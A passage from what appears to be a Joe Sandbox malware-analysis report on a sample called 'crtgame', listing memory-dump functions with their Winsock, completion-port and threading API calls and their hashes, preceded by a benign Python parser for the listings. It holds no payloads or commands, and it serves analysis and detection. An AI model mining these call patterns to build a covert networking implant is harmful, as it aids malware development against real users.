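The per-function API listings in this report become useful only once they are grouped and tagged in bulk. The Python below is an added example for reading this page, not Joe Sandbox code and not part of the analysed sample: it parses the report's "APIs" bullets (direct calls and "Part of subcall function" lines), keys each function by its first reference address, and tags it by the Winsock, I/O-completion-port and threading APIs it touches. The embedded input is constructed from entries on this page; the API sets, the tag names and keying by first reference address are this example's own assumptions.

```python
"""Group Joe Sandbox-style 'APIs' bullets per function and tag the networking pattern.

Added example for reading this report; not Joe Sandbox code and not from the sample.
"""
import re
from dataclasses import dataclass, field

# Constructed input: three 'APIs' sections copied in the report's bullet format.
SAMPLE_REPORT = """\
APIs
• WSASetLastError.WS2_32(00000000,?,?), ref: 02BC2AEA
• connect.WS2_32(00000010,?,?), ref: 02BC2AF5
Strings
Memory Dump Source
APIs
• InterlockedIncrement.KERNEL32(?), ref: 02BC36A7
  • Part of subcall function 02BC2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
  • Part of subcall function 02BC2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
  • Part of subcall function 02BC2420: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
Memory Dump Source
APIs
• WSASetLastError.WS2_32(00000000,?,?,00000001), ref: 02BC2D47
• WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02BC2D5C
  • Part of subcall function 02BC9E92: WSAGetLastError.WS2_32(?,00000080,00000017,02BC3114), ref: 02BC9EA0
Memory Dump Source
APIs
• __beginthreadex.LIBCMT ref: 02BD1B06
• CloseHandle.KERNEL32(?,00000000), ref: 02BD1B37
• ResumeThread.KERNELBASE(?,00000000), ref: 02BD1B45
Memory Dump Source
"""

# One bullet: optional subcall prefix, then Api.Module(optional args), ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Assumed API groupings used for tagging (this example's own choice).
WINSOCK = {"WSASend", "WSARecv", "WSAStartup", "connect", "select", "shutdown",
           "htons", "htonl", "WSASetLastError", "WSAGetLastError"}
IOCP = {"CreateIoCompletionPort", "GetQueuedCompletionStatus", "PostQueuedCompletionStatus"}
THREADING = {"__beginthreadex", "CreateThread", "ResumeThread"}


@dataclass
class FunctionEntry:
    index: int
    direct: list = field(default_factory=list)    # (api, module, ref)
    subcalls: list = field(default_factory=list)  # (callee, api, module, ref)

    @property
    def first_ref(self):
        """Address of the first direct call; used as the function key (assumption)."""
        return self.direct[0][2] if self.direct else None

    def api_names(self, include_subcalls=True):
        names = {api for api, _, _ in self.direct}
        if include_subcalls:
            names |= {api for _, api, _, _ in self.subcalls}
        return names


def parse_api_sections(text):
    """Split the dump into one FunctionEntry per 'APIs' ... 'Memory Dump Source' block."""
    entries, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry(index=len(entries))
            entries.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # 'Strings' and other headings inside the block are ignored
        if m.group("sub"):
            current.subcalls.append((m.group("sub").upper(), m.group("api"),
                                     m.group("module"), m.group("ref").upper()))
        else:
            current.direct.append((m.group("api"), m.group("module"), m.group("ref").upper()))
    return entries


def classify(entry):
    """Tag a function by the API families it reaches directly or through subcalls."""
    names = entry.api_names()
    return {tag for tag, group in (("winsock", WINSOCK), ("iocp", IOCP), ("thread", THREADING))
            if names & group}


def summarize(text):
    """Map first-ref address (or entry index) -> sorted tags for every function."""
    return {e.first_ref or f"entry{e.index}": sorted(classify(e)) for e in parse_api_sections(text)}


if __name__ == "__main__":
    for key, tags in summarize(SAMPLE_REPORT).items():
        print(key, tags)
```

Subcall APIs are counted toward a function's tags because the report attributes them to the caller; pass `include_subcalls=False` to `api_names` when only the function's own imports matter.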
                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 02BD1B06
                                                                          • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02BCA5DA,00000000), ref: 02BD1B37
                                                                          • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02BCA5DA,00000000), ref: 02BD1B45
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          • Opcode ID: cf851f92acfb00da991cdf9877e7a351c00e5fc0044dede305899e73fd295121
                                                                          • Instruction ID: 9ac32b76092e80e528404344cb02207e6703d55b9d0064b975e2dc484bf17a80
                                                                          • Opcode Fuzzy Hash: cf851f92acfb00da991cdf9877e7a351c00e5fc0044dede305899e73fd295121
                                                                          • Instruction Fuzzy Hash: 02F0F670350200ABEB209F6CDC80FD1B3E8EF49324F2405AAF648C7280E771E8929B90
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(02BF7524), ref: 02BC1ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02BC1ACB
                                                                          • InterlockedExchange.KERNEL32(02BF7528,00000000), ref: 02BC1AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          • Opcode ID: 46ac675d13a8ad676d8d81a9b9e6a47f531105e1986d909f8bc174871b7b2f0a
                                                                          • Instruction ID: e16730f5fad8d40f78422ccf877f3964969f75753bef11ee82d1d33c95f7526d
                                                                          • Opcode Fuzzy Hash: 46ac675d13a8ad676d8d81a9b9e6a47f531105e1986d909f8bc174871b7b2f0a
                                                                          • Instruction Fuzzy Hash: EDD02E70C80204ABF61077A4AC0EA38F36CEB00621F0006C0FE3AC60C2EE10A924E1A7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4B1D
                                                                            • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                            • Part of subcall function 02BCDA84: __EH_prolog.LIBCMT ref: 02BCDA89
                                                                            • Part of subcall function 02BCDA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCDB08
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4C1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          • Opcode ID: 2fe30e00f3eed10f0f67426a9285d768b07bfcd99e1f9baa53aa7ddbc51a245a
                                                                          • Instruction ID: 067a145b2e61cd5ef740c78bb90a77d4187c3cd0dacc1099ccb20d8a47c9b2a6
                                                                          • Opcode Fuzzy Hash: 2fe30e00f3eed10f0f67426a9285d768b07bfcd99e1f9baa53aa7ddbc51a245a
                                                                          • Instruction Fuzzy Hash: F0512871D04248DFDB15DFA8C494AEEBBB5EF08314F2481AEE915AB251DB709A44CF60
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02BC3390,00000001,?,00000000,?,?,?,?,?), ref: 02BC2D47
                                                                          • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02BC2D5C
                                                                            • Part of subcall function 02BC9E92: WSAGetLastError.WS2_32(?,00000080,00000017,02BC3114), ref: 02BC9EA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          • Opcode ID: 92ca54174f5ed87810eb1effd0a92ef8ca4585634363b4ef9ee7f793208554b3
                                                                          • Instruction ID: 4bd45604b875e99adb764785b04654eede642ee108d1a050702d95b15f3e0194
                                                                          • Opcode Fuzzy Hash: 92ca54174f5ed87810eb1effd0a92ef8ca4585634363b4ef9ee7f793208554b3
                                                                          • Instruction Fuzzy Hash: 1C0188B5500209EFD7206F54C88486FBBEDFF55364B2009AEFC5987200EB709D008BA1
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,00000000,?,02BC752F,?,02BF74D8,02BF74D8,?,?,02BF74D8,00000000,000007E7), ref: 02BC7D90
                                                                          • shutdown.WS2_32(00000000,00000002), ref: 02BC7D99
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          • Opcode ID: 78ca185ed8eddf281e2407c8e8c3899bce198b02d30e67da251d43e4a43bce69
                                                                          • Instruction ID: ce30497654d30f1c6643e62b768fa857639d63fc6a2a3dfda00532027cbcd4dd
                                                                          • Opcode Fuzzy Hash: 78ca185ed8eddf281e2407c8e8c3899bce198b02d30e67da251d43e4a43bce69
                                                                          • Instruction Fuzzy Hash: 62F06D71A003159FCB10AF68D410BAAB7E9EF49320F21499DED9597380EB70A8008FA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC5049
                                                                            • Part of subcall function 02BC3D7E: htons.WS2_32(?), ref: 02BC3DA2
                                                                            • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                            • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          • Opcode ID: 945e4fa6c24f4fe96559a03c75de314031e860ca4b8ec911b44f446f80d70e3e
                                                                          • Instruction ID: 461504a03023f2bb43756d1e7427f9ea185e6ea61852f31da5bd5d86c9bd3f90
                                                                          • Opcode Fuzzy Hash: 945e4fa6c24f4fe96559a03c75de314031e860ca4b8ec911b44f446f80d70e3e
                                                                          • Instruction Fuzzy Hash: F28126B1D0024E8ECF15DFA8D580AEEBBB5EF48314F20819ED855B7240EB756A45CFA1
                                                                          APIs
                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02C43C08
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bfa000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPathSpecial
                                                                          • String ID:
                                                                          • API String ID: 994120019-0
                                                                          • Opcode ID: 5c9eab3d12dee64b864ae3622609c2100aa913efd499afcd992912cc0bb11a50
                                                                          • Instruction ID: 102eaae84b65427e5dd10e81d4618dbc35d964019b56d74eba55f8ef5fcdbb45
                                                                          • Opcode Fuzzy Hash: 5c9eab3d12dee64b864ae3622609c2100aa913efd499afcd992912cc0bb11a50
                                                                          • Instruction Fuzzy Hash: 7A21A1F260C604AFE7057A09EC46BBABBE4EB84720F06893EE7C447750EA31584186D7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCE352
                                                                            • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          • Opcode ID: bd1fce4ca62367b2166d4a1c9a58bb9586372c9a81f20cfc3db366d8ffe0ec10
                                                                          • Instruction ID: 676e292326649751479f0d928611ae14ad44595b5b5a8eccdefb7bd6f3eef35c
                                                                          • Opcode Fuzzy Hash: bd1fce4ca62367b2166d4a1c9a58bb9586372c9a81f20cfc3db366d8ffe0ec10
                                                                          • Instruction Fuzzy Hash: A3214FB1904209EFDB04DF94D440AEEBBF9EF48310F20816EE515A3240D770EA00CBA1
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC33CC
                                                                            • Part of subcall function 02BC32AB: __EH_prolog.LIBCMT ref: 02BC32B0
                                                                            • Part of subcall function 02BC32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC32C3
                                                                            • Part of subcall function 02BC32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC32EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          • Opcode ID: 0db0f418028fb1bd427560a606c03371dcb0ec6c994141c7edc1c0c93e292a40
                                                                          • Instruction ID: 8a6f6c5d4c539d4967a9179bb3f20778ed4367ff24d054e1afc911054121ed95
                                                                          • Opcode Fuzzy Hash: 0db0f418028fb1bd427560a606c03371dcb0ec6c994141c7edc1c0c93e292a40
                                                                          • Instruction Fuzzy Hash: 79019670214606AFDB04CF59D885F55F7A9FF44320B64C39DE828872C0EB70E811CBA0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDEE2
                                                                            • Part of subcall function 02BC26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                            • Part of subcall function 02BC26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                            • Part of subcall function 02BC26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5553), ref: 02BC2738
                                                                            • Part of subcall function 02BC26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                            • Part of subcall function 02BC26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: fca4701c70042df057de7989c50a086ac93ef158d70e40c9f090b0d71dd48218
                                                                          • Instruction ID: bdfe33545a62b6a7ede5f050ac1d1332f6270ed14a66154ac304823aa5578cf6
                                                                          • Opcode Fuzzy Hash: fca4701c70042df057de7989c50a086ac93ef158d70e40c9f090b0d71dd48218
                                                                          • Instruction Fuzzy Hash: 760190B1901B199FC718CF1AC64094AFBF9EF88710B15C5EED45A8B721E7B1AA40CF94
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDCC1
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BCDEDD: __EH_prolog.LIBCMT ref: 02BCDEE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: 870a2d30468532ab60f7c07969a7533a400f386f7ff3a64bc5d15fb1ea101bdb
                                                                          • Instruction ID: 3dbaaaa35faf4ed92e89592ac5f1c7b96ba7c997fd10aa8d81ed1a09bea2a752
                                                                          • Opcode Fuzzy Hash: 870a2d30468532ab60f7c07969a7533a400f386f7ff3a64bc5d15fb1ea101bdb
                                                                          • Instruction Fuzzy Hash: FBE0C2B1A4420BABCF1DDF68D80177E77A2EB44304F1085FDB809D2640EF708E008E41
                                                                          APIs
                                                                            • Part of subcall function 02BD565A: __getptd_noexit.LIBCMT ref: 02BD565B
                                                                            • Part of subcall function 02BD565A: __amsg_exit.LIBCMT ref: 02BD5668
                                                                            • Part of subcall function 02BD2E93: __getptd_noexit.LIBCMT ref: 02BD2E97
                                                                            • Part of subcall function 02BD2E93: __freeptd.LIBCMT ref: 02BD2EB1
                                                                            • Part of subcall function 02BD2E93: RtlExitUserThread.NTDLL(?,00000000,?,02BD2E73,00000000), ref: 02BD2EBA
                                                                          • __XcptFilter.LIBCMT ref: 02BD2E7F
                                                                            • Part of subcall function 02BD8794: __getptd_noexit.LIBCMT ref: 02BD8798
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: bb65767cf30297b5580b2665993c22732637cf07e2bcac429f3cffcfd78b21aa
                                                                          • Instruction ID: 89941d8f9c674ede39558ee29dfbdddc0f4e29861cb51801d801b9ac27f6767c
                                                                          • Opcode Fuzzy Hash: bb65767cf30297b5580b2665993c22732637cf07e2bcac429f3cffcfd78b21aa
                                                                          • Instruction Fuzzy Hash: B0E0ECB5950600DFEB08BBA4D849FAD77A6AF44302F2005C9F1019B2A1EA74A9419F20
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bfa000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                          • Instruction ID: 72e5ac325ec36a25b28b8e6c8f7c0c4410d190e3ccd6618b47b1d938c3651ddc
                                                                          • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                          • Instruction Fuzzy Hash: 9711A2B210C3089FE3057E6DEC856BAB7E9EF84620F06492EE2C1C3600DA3165448697
                                                                          APIs
                                                                            • Part of subcall function 02BD1010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                            • Part of subcall function 02BD1010: CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                            • Part of subcall function 02BD1010: ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                            • Part of subcall function 02BD1010: CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • TlsSetValue.KERNEL32(00000025,?), ref: 02BD1BAA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: 4be22cba19a46ceebaf5fa5c6115f91594f204d6e08b620f0ac2f6f588ea5ee5
                                                                          • Instruction ID: 5c8bd760e0e72ed99523e085ab4b343a5d2bc5b326bb37843b2fc285ba7dba5a
                                                                          • Opcode Fuzzy Hash: 4be22cba19a46ceebaf5fa5c6115f91594f204d6e08b620f0ac2f6f588ea5ee5
                                                                          • Instruction Fuzzy Hash: EA01D471A00204ABD710CFACD845B9ABBB8EB057A0F104796F829D3680D73199008A94
                                                                          APIs
                                                                            • Part of subcall function 02BC9462: __EH_prolog.LIBCMT ref: 02BC9467
                                                                            • Part of subcall function 02BC9462: _Allocate.LIBCPMT ref: 02BC94BE
                                                                          • _memset.LIBCMT ref: 02BD0339
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02BD03A2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02BD03AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memset
                                                                          • String ID: Unknown error$invalid string position
                                                                          • API String ID: 2731337147-1837348584
                                                                          • Opcode ID: 3a9501780436987094bdd318e5240823d72dff6e2d749945e0284c72a81c5369
                                                                          • Instruction ID: e211142271650ef742882b460ea9620e487954dfbfcb4fdb5802ddca791bd4d8
                                                                          • Opcode Fuzzy Hash: 3a9501780436987094bdd318e5240823d72dff6e2d749945e0284c72a81c5369
                                                                          • Instruction Fuzzy Hash: 8151CB706083418FE714EF24C880B6EBBE4EB98358F540DADF48197692E771E588CF92
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02BD4896,?,?,?,00000000), ref: 02BD8F2D
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 02BD8F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 0def1f1fe7d5559258ccb120fe55866b4c04947c50366873295a4a1431015de6
                                                                          • Instruction ID: c26325203d64ac08a781f709d22b3f4d803b05f820829b18ce9ebb89dcd12015
                                                                          • Opcode Fuzzy Hash: 0def1f1fe7d5559258ccb120fe55866b4c04947c50366873295a4a1431015de6
                                                                          • Instruction Fuzzy Hash: 60B09231484208EBCE412B91EC09B89BF28EB046A2F004850F60E4A0628F725421ABA2
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC24E6
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02BC24FC
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC250E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC256D
                                                                          • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02BC257F
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02BC2599
                                                                          • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC25A2
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC25F0
                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 02BC262F
                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02BC268E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC2699
                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02BC26AD
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02BC26BD
                                                                          • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC26C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                          • String ID:
                                                                          • API String ID: 1213838671-0
                                                                          • Opcode ID: cedaf58af2c59fcf189e6a23e48f1f154c8a07050bce6ea602b07d1edd6242d9
                                                                          • Instruction ID: 07a9caff12448132a4d25a4dd180749d55354abb41e5841b50dab83aa8e8b9ae
                                                                          • Opcode Fuzzy Hash: cedaf58af2c59fcf189e6a23e48f1f154c8a07050bce6ea602b07d1edd6242d9
                                                                          • Instruction Fuzzy Hash: 8D613F71900209EFCB10DFA4D984AAEFBB9FF48354F1049AEE916E7241EB349945DF60
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4533
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                          • htons.WS2_32(?), ref: 02BC4594
                                                                          • htonl.WS2_32(?), ref: 02BC45B7
                                                                          • htonl.WS2_32(00000000), ref: 02BC45BE
                                                                          • htons.WS2_32(00000000), ref: 02BC4672
                                                                          • _sprintf.LIBCMT ref: 02BC4688
                                                                          • htons.WS2_32(?), ref: 02BC45DB
                                                                            • Part of subcall function 02BC90C0: __EH_prolog.LIBCMT ref: 02BC90C5
                                                                            • Part of subcall function 02BC90C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC9140
                                                                            • Part of subcall function 02BC90C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC915E
                                                                            • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                            • Part of subcall function 02BCD87F: __EH_prolog.LIBCMT ref: 02BCD884
                                                                          • htonl.WS2_32(?), ref: 02BC48A7
                                                                          • htonl.WS2_32(00000000), ref: 02BC48AE
                                                                          • htonl.WS2_32(00000000), ref: 02BC48F3
                                                                          • htonl.WS2_32(00000000), ref: 02BC48FA
                                                                          • htons.WS2_32(?), ref: 02BC491A
                                                                          • htons.WS2_32(?), ref: 02BC4924
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                          • String ID:
                                                                          • API String ID: 725951905-0
                                                                          • Opcode ID: 0bf638e3ccb5b6c544e44d695592810e67b69211104744337ffee6a9509872e5
                                                                          • Instruction ID: ddbadfefe740597f6d18437e64f2a8bcc7bfa8037c145d1b0c1398787dc56c36
                                                                          • Opcode Fuzzy Hash: 0bf638e3ccb5b6c544e44d695592810e67b69211104744337ffee6a9509872e5
                                                                          • Instruction Fuzzy Hash: C0022771D00219EEDF15DFA4D854BEEBBB9AF09304F20409EE545A7280DB745A88DFA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3428
